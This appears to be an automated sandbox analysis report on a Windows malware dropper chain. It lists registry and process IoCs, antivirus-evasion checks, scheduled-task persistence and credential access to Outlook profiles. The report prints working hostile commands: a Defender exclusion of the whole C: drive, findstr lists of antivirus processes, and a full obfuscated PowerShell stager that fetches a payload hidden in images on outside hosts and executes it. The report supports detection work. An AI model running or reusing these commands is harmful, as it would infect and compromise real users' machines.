Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | expand.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1ecf164df8.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | extrac32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Msbuild.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | 24fba0a6a6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rapes.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | a78102cae3.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1abbe437ef.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Occupation.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | micE72.tmp.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 68174908c0.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | tasklist.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | a78102cae3.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | D85OAYSPRW6ZOQBEAL9BAA9T7.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | 24fba0a6a6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | tasklist.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 71c36a0ccc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | BitLockerToGo.exe
Checks processor information in registry (2 TTPs, 10 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | javaw.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | javaw.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe

Delays execution with timeout.exe (1 IoCs)
pid | Process
956 | timeout.exe

Kills process with taskkill (5 IoCs)
pid | Process
6264 | taskkill.exe
5004 | taskkill.exe
1468 | taskkill.exe
7916 | taskkill.exe
7608 | taskkill.exe

Modifies registry class (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | firefox.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | cmd.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2136 | schtasks.exe
3524 | schtasks.exe
4532 | schtasks.exe
5708 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 1720 rapes.exe 1720 rapes.exe 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4444 powershell.exe 4444 powershell.exe 4444 powershell.exe 4308 powershell.exe 4308 powershell.exe 4308 powershell.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4600 Msbuild.exe 4600 Msbuild.exe 4600 Msbuild.exe 4600 Msbuild.exe 2420 rapes.exe 2420 rapes.exe 3020 powershell.exe 3020 powershell.exe 3020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 4844 tasklist.exe Token: SeDebugPrivilege 4444 tasklist.exe Token: SeDebugPrivilege 4444 powershell.exe Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 3848 RegAsm.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 5360 powershell.exe Token: SeDebugPrivilege 5536 powershell.exe Token: SeDebugPrivilege 5808 powershell.exe Token: SeDebugPrivilege 5572 aspnet_compiler.exe Token: SeDebugPrivilege 6264 taskkill.exe Token: SeDebugPrivilege 5004 taskkill.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeDebugPrivilege 7916 taskkill.exe Token: SeDebugPrivilege 7608 taskkill.exe Token: SeDebugPrivilege 6412 firefox.exe Token: SeDebugPrivilege 6412 firefox.exe Token: SeDebugPrivilege 3544 1abbe437ef.exe
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 2436 1ecf164df8.exe 2436 1ecf164df8.exe 2436 1ecf164df8.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 2436 1ecf164df8.exe 2436 1ecf164df8.exe 2436 1ecf164df8.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6412 firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1968 wrote to memory of 1720 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 87 PID 1968 wrote to memory of 1720 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 87 PID 1968 wrote to memory of 1720 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 87 PID 1720 wrote to memory of 3928 1720 rapes.exe 93 PID 1720 wrote to memory of 3928 1720 rapes.exe 93 PID 1720 wrote to memory of 3928 1720 rapes.exe 93 PID 3928 wrote to memory of 4536 3928 ReK7Ewx.exe 94 PID 3928 wrote to memory of 4536 3928 ReK7Ewx.exe 94 PID 3928 wrote to memory of 4536 3928 ReK7Ewx.exe 94 PID 4536 wrote to memory of 1836 4536 cmd.exe 96 PID 4536 wrote to memory of 1836 4536 cmd.exe 96 PID 4536 wrote to memory of 1836 4536 cmd.exe 96 PID 4536 wrote to memory of 4844 4536 cmd.exe 99 PID 4536 wrote to memory of 4844 4536 cmd.exe 99 PID 4536 wrote to memory of 4844 4536 cmd.exe 99 PID 4536 wrote to memory of 5096 4536 cmd.exe 100 PID 4536 wrote to memory of 5096 4536 cmd.exe 100 PID 4536 wrote to memory of 5096 4536 cmd.exe 100 PID 4536 wrote to memory of 4444 4536 cmd.exe 101 PID 4536 wrote to memory of 4444 4536 cmd.exe 101 PID 4536 wrote to memory of 4444 4536 cmd.exe 101 PID 4536 wrote to memory of 4440 4536 cmd.exe 102 PID 4536 wrote to memory of 4440 4536 cmd.exe 102 PID 4536 wrote to memory of 4440 4536 cmd.exe 102 PID 4536 wrote to memory of 3660 4536 cmd.exe 103 PID 4536 wrote to memory of 3660 4536 cmd.exe 103 PID 4536 wrote to memory of 3660 4536 cmd.exe 103 PID 4536 wrote to memory of 2056 4536 cmd.exe 104 PID 4536 wrote to memory of 2056 4536 cmd.exe 104 PID 4536 wrote to memory of 2056 4536 cmd.exe 104 PID 4536 wrote to memory of 3956 4536 cmd.exe 105 PID 4536 wrote to memory of 3956 4536 cmd.exe 105 PID 4536 wrote to memory of 3956 4536 cmd.exe 105 PID 4536 wrote to memory of 988 4536 cmd.exe 106 PID 4536 wrote to memory of 988 4536 cmd.exe 106 PID 4536 wrote to memory of 988 4536 cmd.exe 106 PID 4536 wrote to memory of 4200 4536 cmd.exe 107 PID 4536 wrote to memory of 4200 4536 cmd.exe 107 PID 4536 wrote to memory of 4200 4536 cmd.exe 107 PID 4536 wrote to memory of 4592 4536 cmd.exe 108 PID 4536 wrote to memory of 4592 4536 cmd.exe 108 PID 4536 wrote to memory of 4592 4536 cmd.exe 108 PID 4536 wrote to memory of 1556 4536 cmd.exe 109 PID 4536 wrote to memory of 1556 4536 cmd.exe 109 PID 4536 wrote to memory of 1556 4536 cmd.exe 109 PID 4592 wrote to memory of 4912 4592 Occupation.com 110 PID 4592 wrote to memory of 4912 4592 Occupation.com 110 PID 4592 wrote to memory of 4912 4592 Occupation.com 110 PID 4592 wrote to memory of 2100 4592 Occupation.com 112 PID 4592 wrote to memory of 2100 4592 Occupation.com 112 PID 4592 wrote to memory of 2100 4592 Occupation.com 112 PID 4912 wrote to memory of 2136 4912 cmd.exe 114 PID 4912 wrote to memory of 2136 4912 cmd.exe 114 PID 4912 wrote to memory of 2136 4912 cmd.exe 114 PID 1720 wrote to memory of 1616 1720 rapes.exe 115 PID 1720 wrote to memory of 1616 1720 rapes.exe 115 PID 1720 wrote to memory of 3676 1720 rapes.exe 116 PID 1720 wrote to memory of 3676 1720 rapes.exe 116 PID 3676 wrote to memory of 2420 3676 m4mrV1B.exe 117 PID 3676 wrote to memory of 2420 3676 m4mrV1B.exe 117 PID 2420 wrote to memory of 4452 2420 cmd.exe 119 PID 2420 wrote to memory of 4452 2420 cmd.exe 119 PID 4452 wrote to memory of 4444 4452 WScript.exe 120 PID 4452 wrote to memory of 4444 4452 WScript.exe 120
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe
Processes
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3420
C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1968
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1720
C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3928
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4536
C:\Windows\SysWOW64\expand.exeexpand Ae.msi Ae.msi.bat6⤵
- System Location Discovery: System Language Discovery
PID:1836
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4844
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
PID:5096
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4444
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:4440
C:\Windows\SysWOW64\cmd.execmd /c md 7899196⤵
- System Location Discovery: System Language Discovery
PID:3660
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Deviation.msi6⤵
- System Location Discovery: System Language Discovery
PID:2056
C:\Windows\SysWOW64\findstr.exefindstr /V "Brian" Challenges6⤵
- System Location Discovery: System Language Discovery
PID:3956
C:\Windows\SysWOW64\cmd.execmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com6⤵
- System Location Discovery: System Language Discovery
PID:988
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q6⤵
- System Location Discovery: System Language Discovery
PID:4200
C:\Users\Admin\AppData\Local\Temp\789919\Occupation.comOccupation.com q6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4592
C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3848
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"8⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5572
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:1556
C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:1616
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188
C:\Users\Admin\AppData\Local\Temp\micE72.tmp.exeC:\Users\Admin\AppData\Local\Temp\micE72.tmp.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1544
C:\Windows\SYSTEM32\cmd.execmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"5⤵PID:3704
C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3676
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67cc62a429f2f.vbs5⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2420
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4452
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ
@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@